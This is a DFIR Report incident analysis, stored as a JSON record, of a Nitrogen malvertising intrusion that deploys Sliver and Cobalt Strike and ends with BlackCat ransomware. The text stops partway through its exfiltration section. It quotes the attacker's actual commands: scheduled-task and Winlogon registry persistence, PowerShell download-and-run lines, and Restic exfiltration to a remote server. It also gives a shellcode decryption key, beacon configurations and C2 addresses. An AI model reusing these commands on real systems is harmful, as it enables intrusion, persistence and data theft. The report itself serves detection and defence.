{
	"id": "e1b7f4f0-84e2-41df-aa8e-93ba52e785ac",
	"created_at": "2026-04-06T00:07:57.859698Z",
	"updated_at": "2026-04-10T13:12:12.974756Z",
	"deleted_at": null,
	"sha1_hash": "2d2b97a37fe5e90dcb511358ef5c177899f5f5f1",
	"title": "Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8425150,
	"plain_text": "Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware\r\n- The DFIR Report\r\nBy editor\r\nPublished: 2024-09-30 · Archived: 2026-04-05 12:57:08 UTC\r\nKey Takeaways\r\nIn November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website\r\nimpersonating Advanced IP Scanner.\r\nNitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the beachhead host and perform further\r\nmalicious actions. The two post-exploitation frameworks were loaded in memory through Python scripts.\r\nAfter obtaining initial access and establishing further command and control connections, the threat actor enumerated\r\nthe compromised network with the use of PowerSploit, SharpHound, and native Windows utilities. Impacket was\r\nemployed to move laterally, after harvesting domain credentials.\r\nThe threat actor deployed an opensource backup tool call Restic on a file server to exfiltrate share data to a remote\r\nserver.\r\nEight days after initial access the threat actor modified a privileged user password and deployed BlackCat\r\nransomware across the domain using PsExec to execute a batch script.\r\nSix rules were added to our Private Ruleset related to this intrusion.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon. \r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, opendir reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for pricing or a demo!\r\nTable of Contents:\r\nCase Summary\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 1 of 37\n\nCase Summary\r\nThe incident began when a user unknowingly downloaded a malicious version of Advanced IP Scanner from a fraudulent\r\nwebsite that mimicked the legitimate one, leveraging Google ads to rank higher in search results. Analysis of the attack\r\npattern and loader signature suggests this was part of a Nitrogen campaign, consistent with previous public reports. The\r\ncompromised installer came as a ZIP file, which the victim extracted before launching the embedded executable, triggering\r\nthe infection.\r\nThe executable was a legitimate Python binary, which side-loaded a modified Python DLL specifically designed to execute\r\nNitrogen code. This process then dropped a Sliver beacon in an AppData subfolder named “Notepad.” All malware deployed\r\nduring the intrusion was obfuscated using Py-Fuscate to conceal malicious Python scripts. About eight minutes after the\r\nNitrogen execution, the attacker initiated hands-on keyboard discovery, utilizing Windows utilities such as net, ipconfig, and\r\nnltest. Two minutes later, additional Sliver beacons were deployed on the compromised host, with persistence established\r\nthrough scheduled tasks and registry key modifications.\r\nA little over an hour after the initial execution, the threat actor deployed additional malware, this time Cobalt Strike beacons,\r\nagain wrapped in the Py-Fuscate obfuscation technique. The discovery phase continued with detailed enumeration of the\r\nActive Directory domain, including local and domain administrators, domain controllers, and computers. To deepen their\r\nunderstanding of the environment, the attacker utilized tools such as SharpHound and PowerSploit. The Cobalt Strike\r\nbeacon was then used to dump domain credentials from LSASS, granting the attacker local admin credentials with broad\r\naccess across the network.\r\nUsing the stolen credentials, the threat actor leveraged Impacket’s wmiexec to move laterally to a server, where they used\r\ncurl to download a ZIP file containing their tools. After extracting the archive, they repeated the same persistence techniques\r\nobserved on the beachhead, creating scheduled tasks and modifying registry keys. The attacker then targeted a second\r\nserver, replicating the same steps to deploy their tools and maintain persistence. Shortly after, a second credential dump was\r\nperformed, again targeting LSASS memory. Following this, the threat actor began using a domain administrator account,\r\nindicating they likely obtained those credentials during this phase.\r\nThe threat actor continued their lateral movement, replicating the same actions on both a file server and a backup server.\r\nApproximately six hours after gaining initial access, they deployed the open-source backup tool Restic on the file server.\r\nUsing Restic, the attacker exfiltrated data from the file shares to a remote server located in Bulgaria. After this, the hands-on\r\nactivity significantly decreased and remained largely silent until the seventh day.\r\nOn the seventh day, the threat actor logged into the backup server and accessed the backup console. No further actions were\r\nobserved, leading us to assess that this was likely a discovery effort aimed at understanding the backup configurations.\r\nOn the eighth day, the threat actor shifted to their final objectives. They identified the domain controllers and used xcopy\r\nfrom their initial lateral movement server to transfer tools to one of the domain controllers, executing them remotely via\r\nWMIC. Next, they ran a batch script on the domain controller using PSEXEC, targeting a privileged backup service account,\r\nwhich changed that accounts credentials. From the staging server, the attacker began distributing the BlackCat ransomware\r\nbinary across the network using SMB and the Windows copy utility. This was followed by executing another batch script via\r\nPSEXEC on multiple remote hosts, initiating the ransomware deployment.\r\nThe final script executed a series of actions on remote hosts, including configuring them to start in Safe Mode with\r\nNetworking and setting a registry run key to launch the ransomware binary upon reboot. It also set the compromised backup\r\nservice account to auto login using Winlogon, and then forced a system reboot. As a result, the hosts rebooted into Safe\r\nMode, where the ransomware was automatically executed. This led to file encryption across the affected systems, with the\r\nransomware leaving a note on each host. The Time to Ransomware (TTR) was approximately 156 hours, spanning over\r\neight calendar days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by Angelo Violetti, @0xtornado (Linkedin) and\r\n.\r\nInitial Access\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 2 of 37\n\nDrive-by Compromise\r\nBased on threat intelligence sources and the file name, we are highly confident that the threat actors accessed the victim’s\r\ninfrastructure through a Nitrogen campaign, which delivered a ZIP file via malicious Google ads (i.e., malvertising).\r\nNitrogen is known for leveraging legitimate utilities like Advanced IP Scanner, Putty, etc. to conceal malware. The\r\nfollowing graph shows the Nitrogen infection chain and how it executed Sliver.\r\nThe ZIP file named Version.zip contained mainly:\r\na legitimate Python executable named setup.exe which was run by the victim.\r\ntwo hidden Python DLLs.\r\nUpon execution of Setup.exe, the following actions were performed:\r\nThe hidden python311.dll was loaded (DLL sideloading) and the Nitrogen code was launched.\r\nA legitimate copy of Advanced IP Scanner was copied into the %Public%\\Downloads folder.\r\npython.exe, pycryptodome, and a Sliver beacon were placed into a folder named %AppData%\\Notepad.\r\nThe Sliver beacon was executed through a Python script named slv.py which decrypts an AES-encrypted DLL\r\n(data.aes) and loads it into memory.\r\nAdvanced IP Scanner was installed in the compromised system.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 3 of 37\n\nA very similar campaign was reported by @dipotwb on Twitter. We also observed overlap with campaigns reported by\r\nEsentire.\r\nExecution\r\nA few minutes later, the threat actor deployed Python scripts on the beachhead, serving as loaders for both Sliver and Cobalt\r\nStrike.\r\nThe following image shows the sequence of beacons executed on the beachhead host.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 4 of 37\n\nSliver\r\nThe Python script, slv.py, used to load Sliver into memory, was heavily obfuscated. However, buried within thousands of\r\nlines of code was the critical section responsible for executing the Sliver beacon.\r\nBased on the analysis of these artifacts, it appears the Sliver payload was likely obfuscated using Py-Fuscate, as the tool’s\r\nencode function mirrored the same imports and procedures found in the obfuscated script, effectively concealing the\r\nmalicious code.\r\nThe Sliver execution revealed multiple interesting debugging strings. In the first instance, Windows API functions’ addresses\r\nare resolved.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 5 of 37\n\nSubsequently, the Sliver DLL is injected in memory and the DLL entrypoint is called.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 6 of 37\n\nThose debugging strings are the same ones used by Pyramid in the pythonmemorymodule which is a module used to inject\r\nand execute DLLs in memory.\r\nBy analyzing the Python.exe process memory, it was possible to notice the DLL injected in the memory sections previously\r\ndescribed in the debugging strings.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 7 of 37\n\nThe Sliver DLL exports multiple functions, however, StartW is the one to run the beacon.\r\nMultiple strings related to Sliver were found in the process memory.\r\nCobalt Strike\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 8 of 37\n\nwo14.py is another highly obfuscated Python script that acts as a loader for custom shellcode. In this specific case, the threat\r\nactor specified an AES-encrypted Cobalt Strike shellcode which is:\r\nDecrypted through the key “we3p2v5t85”.\r\nCopied into a newly allocated memory region in the Heap.\r\nExecuted by invoking the function CreateThread.\r\nwo12.py has the same behavior.\r\nThe Sysmon Event ID 10 shows the self-injection technique performed by the Python Cobalt Strike loader.\r\nPersistence\r\nScheduled Task\r\nDuring the intrusion, the threat actor created multiple scheduled tasks to achieve persistence. This persistence technique was\r\nabused on the beachhead host and each host moved to laterally during the first day.\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr C:\\Users\\REDACTED\\AppData\\Loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\users\\REDACTED\\appdata\\loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr C:\\Users\\REDACTED\\AppData\\Loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 9 of 37\n\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\users\\REDACTED\\appdata\\loca\r\nschtasks /create /ru SYSTEM /tn \"OneDrive Security Task-S-1-5-21-REDACTED\" /tr c:\\windows\\adfs\\py\\UpdateEdge\r\nschtasks /create /I 1 /TR C:\\Users\\REDACTED\\AppData\\Local\\Notepad\\UpdateEG.bat /TN UpdateEdge /SC ONIDLE\r\nHowever, some of them had mistakes and therefore were not correctly working.\r\nFor example, in the following task, the threat actor didn’t specify the “\\” between “C:” and the executable name.\r\nschtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE\r\nWhile some tasks used the ‘ONSTART’ option to enable persistence after reboot, some used a time frame to execute every\r\n720 minutes. For example, on a server the threat actor dropped a BAT file name UpdateEdge.bat and subsequently created\r\ntwo scheduled tasks using this option.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 10 of 37\n\nRegistry Key\r\nTo ensure persistence on the beachhead host and three servers, the threat actor added an entry in the Winlogon\\Userinit\r\nregistry key to ensure the execution of UpdateEdge.bat whenever a user logs into the systems.\r\ncmd.exe /C reg add \"HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon\" /v UserInit /t reg_sz /d \"c:\\w\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 11 of 37\n\nPrivilege Escalation\r\nOn the beachhead system, the initial payload setup.exe was executed with High integrity level, which means that the binary\r\nwas run with the access level equivalent to Administrator access.\r\nAn injected cmd.exe process from the beachhead host opened winlogon.exe with an access mask of 0x143A, which, when\r\ndecoded, revealed the PROCESS_VM_WRITE permission. The cmd.exe process then executed process injection into\r\nwinlogon.exe.\r\nAll scheduled tasks created by the threat actor were setup to run in SYSTEM context ensuring that access would stay\r\nelevated on hosts.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 12 of 37\n\nDefense Evasion\r\nNitrogen\r\nBy analyzing the modified Python DLL (python311.dll), we notice multiple defense evasion functionalities implemented,\r\nsuch as:\r\nRemoving hooks from Windows API functions.\r\nObfuscating the payload in memory (i.e., Sleep Obfuscation).\r\nBypassing AMSI, WLDP, and ETW.\r\nBased on code overlaps, those techniques could have been copied from the following GitHub repositories:\r\nAntimalware-Research/Generic/Userland Hooking/AntiHook at master · NtRaiseHardError/Antimalware-Research ·\r\nGitHub\r\nGitHub – RtlDallas/KrakenMask: Sleep obfuscation\r\ndonut/loader/bypass.c at master · TheWover/donut · GitHub\r\nPatching WLDP · GitHub\r\nAn example of code overlap is showed in the following image related to the IsHooked() function.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 13 of 37\n\nMasquerading\r\nWith the aim to conceal the malicious activities into normal system events, the threat actor masqueraded both the initial\r\npayload and the persistence mechanisms by:\r\nRenaming python.exe to setup.exe.\r\nNaming the scheduled tasks to mirror OneDrive and Microsoft Edge.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 14 of 37\n\nRenaming python executable used for executing their python stagers for Sliver and Cobalt Strike.\r\nProcess injection\r\nThe threat actor was observed injecting into various processes during the intrusion. One specific occasion was during the\r\nelevation to SYSTEM on the beachhead host.\r\nClearing logs\r\nExecution of the ransomware payload included clearing of various event logs while the hosts were in safe mode.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 15 of 37\n\nSafeboot\r\nBefore executing the final ransomware the threat actor set all hosts to restart in safe mode with networking. This can be used\r\nto prevent antivirus or other preventative tools from stopping the ransom execution as many won’t start when a host is\r\nbooted in safe mode. It has been used by several ransomware families.\r\nCredential Access\r\nTwo hours after initial access, the threat actor utilized Cobalt Strike’s credential dumping functionalities to access the\r\nLSASS process on the beachhead host. This provided them access to a shared local administrator account. Around two hours\r\nafter that they landed on a server during lateral movement activity, the threat actor was seen accessing LSASS. After this we\r\nobserved the use of a domain administrator account indicating this second access likely delivered those credentials.\r\nDiscovery\r\nSliver\r\nA few minutes after its execution, Sliver launched the following commands to enumerate:\r\nLocal and domain admins.\r\nDomain computers.\r\nActive Directory trusts.\r\nNetwork adapters.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 16 of 37\n\nnet group \"domain admins\" /domain\r\nipconfig /all\r\nnltest /domain_trusts\r\nnet localgroup administrators\r\nnet group \"Domain Computers\" /domain\r\nCobalt Strike\r\nAs with Sliver, Cobalt Strike was utilized to perform hands-on keyboard discovery activities.\r\ncmd.exe /C net group \"Domain controllers\" /DOMAIN\r\ncmd.exe /C net group \"domain admins\" /DOMAIN\r\ncmd.exe /C net localgroup Administrators\r\ncmd.exe /C net group /Domain\r\ncmd.exe /C net group \"Domain Computers\" /DOMAIN\r\nPowerView\r\nOn the beachhead host, the threat actor loaded in memory PowerView to perform further discovery activities. This specific\r\naction was identified through PowerShell Script Block Logging.\r\nPowerView was used to:\r\nGather the local admins.\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 17 of 37\n\nExtract the servers in the environment.\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:54350/'); Get-DomainComputer -OperatingSystem\r\nBloodHound\r\nThe $MFT showed also that in the first phases of the intrusion, the threat actor performed a BloodHound collection to likely\r\nidentify paths to escalate privileges to domain admin.\r\nLateral Movement\r\nRemote Desktop Protocol\r\nOn the first day of the intrusion, four hours after the Nitrogen execution, the threat actor started interacting with other\r\nsystems such as a file server through a Cobalt Strike beacon which was injected into winlogon.exe.\r\nWindows Management Instrumentation (WMI)\r\nFour hours after initial access, the threat actor moved laterally to a server using Impacket’s wmiexec and downloaded a ZIP\r\nfile containing Python and a Cobalt Strike beacon (wo12.py and wo14.py ).\r\nPass the Hash\r\nDuring the intrusion we observed three instances of possible pass-the-hash activity in the logs. These involved instances\r\nwhere the threat actor appear to be moving from the SYSTEM context to a domain administrator account.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 18 of 37\n\nSMB Admin Shares\r\nWhile some of the threat actor’s payloads were downloaded from a remote resource they also at times transferred their\r\ntooling laterally using SMB, and then executed using WMIC or wmiexec.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 19 of 37\n\nCommand and Control\r\nOver the course of the intrusion the threat actor relied on Sliver and Cobalt Strike. Sliver was used most heavily during the\r\nfirst day of the intrusion with Cobalt Strike then being used over the full length of the intrusion.\r\nCobalt Strike\r\nIP Port Ja3 Ja3s ASN Org ASN\r\n91.92.250.65 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 LIMENET 394,711\r\n91.92.250.60 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 LIMENET 394,711\r\nwo14.py Cobalt Strike configuration.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 38500\r\nMaxGetSize - 13982519\r\nJitter - 27\r\nMaxDNS - Not Found\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 20 of 37\n\nPublicKey_MD5 - 1329384dfdcfde2228da94e2a042f2b4\r\nC2Server - 91.92.250.65,/broadcast\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, lik\r\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\r\nMalleable_C2_Instructions - Remove 1308 bytes from the end\r\n Remove 1 bytes from the end\r\n Remove 194 bytes from the beginning\r\n Base64 decode\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: application/json, text/plain, */*\r\n Accept-Language: en-US,en;q=0.5\r\n Origin: https://www.amazon.com\r\n Referer: https://www.amazon.com\r\n Sec-Fetch-Dest: empty\r\n Sec-Fetch-Mode: cors\r\n Sec-Fetch-Site: cross-site\r\n Te: trailers\r\n Metadata\r\n base64\r\n header \"x-amzn-RequestId\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: */*\r\n Origin: https://www.amazon.com\r\n SessionId\r\n base64url\r\n header \"x-amz-rid\"\r\n Output\r\n base64url\r\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"app\r\n append \"\"\r\n\"\r\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 21 of 37\n\nEmpty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nwo12.py Cobalt Strike configuration.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 38500\r\nMaxGetSize - 13982519\r\nJitter - 27\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - f27a9b7c29960aaf911f2885b40536c2\r\nC2Server - 91.92.250.60,/broadcast\r\nUserAgent - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, lik\r\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\r\nMalleable_C2_Instructions - Remove 1308 bytes from the end\r\n Remove 1 bytes from the end\r\n Remove 194 bytes from the beginning\r\n Base64 decode\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: application/json, text/plain, */*\r\n Accept-Language: en-US,en;q=0.5\r\n Origin: https://www.amazon.com\r\n Referer: https://www.amazon.com\r\n Sec-Fetch-Dest: empty\r\n Sec-Fetch-Mode: cors\r\n Sec-Fetch-Site: cross-site\r\n Te: trailers\r\n Metadata\r\n base64\r\n header \"x-amzn-RequestId\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: */*\r\n Origin: https://www.amazon.com\r\n SessionId\r\n base64url\r\n header \"x-amz-rid\"\r\n Output\r\n base64url\r\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"app\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 22 of 37\n\nappend \"\"\r\n\"\r\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nThe two Cobalt Strike C2 showed the classic HTTP response related to the post-exploitation framework:\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 23 of 37\n\nHTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\nDate: Day, DD Mmm YYYY HH:MM:SS GMT\r\nContent-Length: 0\r\nBy diving deeper into the two command and control servers, it was noticed that both of them exposed the HTTP service on\r\nport 81 with the following HTTP response.\r\nTherefore, the following FOFA query was built to identify further potential C2 servers matching this pattern.\r\n\"HTTP/1.1 307 Temporary Redirect\" \u0026\u0026 \"Content-Type: text/html; charset=utf-8\" \u0026\u0026 \"Location: https://www.cloudf\r\nSome of the first results provided by FOFA via the above-mentioned query were reported by Rapid7 in one of their latest\r\nblog posts.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 24 of 37\n\nBased on FOFA results, all the identified command and control servers were in Bulgaria and the Netherlands.\r\nIP Country\r\n91.92.240.175 BG\r\n91.92.240.194 BG\r\n91.92.241.117 BG\r\n91.92.242.182 BG\r\n91.92.242.39 BG\r\n91.92.242.55 BG\r\n91.92.245.174 BG\r\n91.92.245.175 BG\r\n91.92.247.123 BG\r\n91.92.247.127 BG\r\n91.92.249.110 BG\r\n91.92.250.148 BG\r\n91.92.250.158 BG\r\n91.92.250.60 BG\r\n91.92.250.65 BG\r\n91.92.250.66 BG\r\n91.92.251.240 BG\r\n94.156.67.175 BG\r\n94.156.67.180 BG\r\n94.156.67.185 BG\r\n94.156.67.188 BG\r\n141.98.6.195 NL\r\n193.42.33.14 NL\r\n194.180.48.165 NL\r\n194.180.48.42 NL\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 25 of 37\n\n194.49.94.21 NL\r\n194.49.94.22 NL\r\nFurthermore, we noticed that four IP addresses (91.92.250.158, 91.92.251.240, 94.156.67.175, 94.156.67.180) had an\r\nuntrusted certificate on port 441 with protocol HTTPS associated with Alibaba, when they were active Cobalt Strike servers.\r\nThe certificate serial number (1657766544761773100) was used to identify other possibly used by the same threat actors,\r\nand further servers were detected which showed a behavior similar to what was previously described. For example, the IP\r\naddress 185.73.124.238 shares the same certificate and is, at the time of report writing, an active Cobalt Strike C2 server.\r\nAs described in a Hunt.io blog post, these specific certificate attributes like CommonName and Organization are associated\r\nwith the usage of RedGuard which is a C2 redirector.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 26 of 37\n\nSliver\r\nIP Port Ja3 Ja3s\r\nASN\r\nOrg\r\nASN\r\n194.49.94.18 8443 19e29534fd49dd27d09234e639c4057e f4febc55ea12b31ae17cfb7e614afda8\r\nMatrix\r\nTelecom\r\nLtd\r\n216,419\r\n194.169.175.134 8443 d6828e30ab66774a91a96ae93be4ae4c f4febc55ea12b31ae17cfb7e614afda8\r\nMatrix\r\nTelecom\r\nLtd\r\n216,419\r\nBoth the Sliver servers 194.49.94[.]18 and 194.169.175[.]134 had invalid certificates on port 8443.\r\nExfiltration\r\nThe threat actor used Restic, to exfiltrate directories directly from a file server. Below are the commands used by the threat\r\nactor to initiate the backup repository and exfiltrate the data:\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 27 of 37\n\nrestic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt\r\nrestic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \"F:\\\r\nThe threat actor exfiltrated the data over HTTP to server hosted on 195.123.226[.]84 . The different parameters used by the\r\nthreat actor are:\r\n“-r rest”: The -r option is used to specify the location of the repository where the backup data will be stored, this can\r\nbe anything from an S3 bucket to a SFTP server. 